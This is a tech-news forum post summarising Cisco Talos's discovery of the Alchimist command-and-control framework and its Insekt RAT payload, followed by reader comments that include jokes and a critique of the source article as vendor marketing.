The attack framework of probable Chinese origin used by cybercriminals has been discovered:
A standalone Command and Control (C2) server called "Alchimist" was recently discovered by Cisco Talos. The framework has been designed to run attacks via standalone GoLang-based executables that can be distributed easily. The framework found by Talos contains both the whole web user interface and the payloads.
[...] Alchimist, whose name has been given by its developer, uses GoLang-based assets, which are custom-made embedded packages, to store all the resources needed for its operations as a C2 server. During initialization, all its content is placed in hard coded folders, namely /tmp/Res for the web interface, HTML files and more folders, and /tmp/Res/Payload for its payloads for Windows and Linux operating systems.
A self-signed certificate without any server name is also dropped in the /tmp folder (Figure A), together with its key for use in HTTPS communications. That certificate could be found on five different IP addresses on the Internet at the time of the research, all of them used for Alchimist.
[...] Most common features expected to handle Remote Administration Tool (RAT) malware are implemented in the interface, yet one stands out according to the researchers: The ability to generate PowerShell and wget code snippets for Windows and Linux systems. These commands might be embedded in malicious documents, LNK files or any other kind of files used for initial compromise, and download/install the additional payload provided by the framework: the Insekt RAT.
[...] More of such attack frameworks have been found lately. Manjusaka, a Chinese sibling of Sliver and Cobalt Strike, appeared in 2022, programmed in GoLang for its C2 part, while the payloads were made in Rust programming language. Rust, like GoLang, enables a developer to compile code on several different platforms very easily. It is expected to see more multiplatform frameworks written in Go and Rust programming languages.
The discovery of Alchimist stands as another indication that "threat actors are rapidly adopting off-the-shelf C2 frameworks to carry out their operations," according to Cisco Talos.
(Score: 4, Touché) by coolgopher on Tuesday October 18 2022, @01:11AM
The solution is obvious. Simply treat any Go runtime as malware and have the AV tools nuke them. :D
(Score: 0) by Anonymous Coward on Tuesday October 18 2022, @02:34AM
> New Alchimist attack framework
Not to be confused with a member of the New Alchemy Institute, https://en.wikipedia.org/wiki/New_Alchemy_Institute [wikipedia.org]
(Score: 5, Insightful) by canopic jug on Tuesday October 18 2022, @11:06AM
Interesting. The article was more informercial than article. It was written by a Trend Micro employee, so of course it has no information about how the "Alchimist" trojan [talosintelligence.com] actually gets installed on Linux. He also avoids recommending preventative measures and instead concentrates his recommendations on corrective action which, some coincidence, is the business model of the company he works for. Without information about where or how to download it or even a link to the source repository, there's not much to go on. All in all it looks like another FUD article designed to cast aspersions against Linux and put air under the wings of the assertion that "see-Linux-is-just-as-vulnerable-so-you-might-as-well-use-Windows" mantra bleated breathlessly by the security poseurs.
Furthermore, this is yet another reason why a mixture of non-x86 architectures are needed for critical services. If you have a mixture of types of hardware, even if the compiled binaries blow through one set of hardware, the other(s) might have enough of a delay before getting hit that you have a little time to shore up defenses. However, Sparch is gone and ARM has not yet fully arrived so with nearly all servers being x86 these days data centers are like digital tinderboxes and, where there is a Windows presence, digital chernobyls.
Money is not free speech. Elections should not be auctions.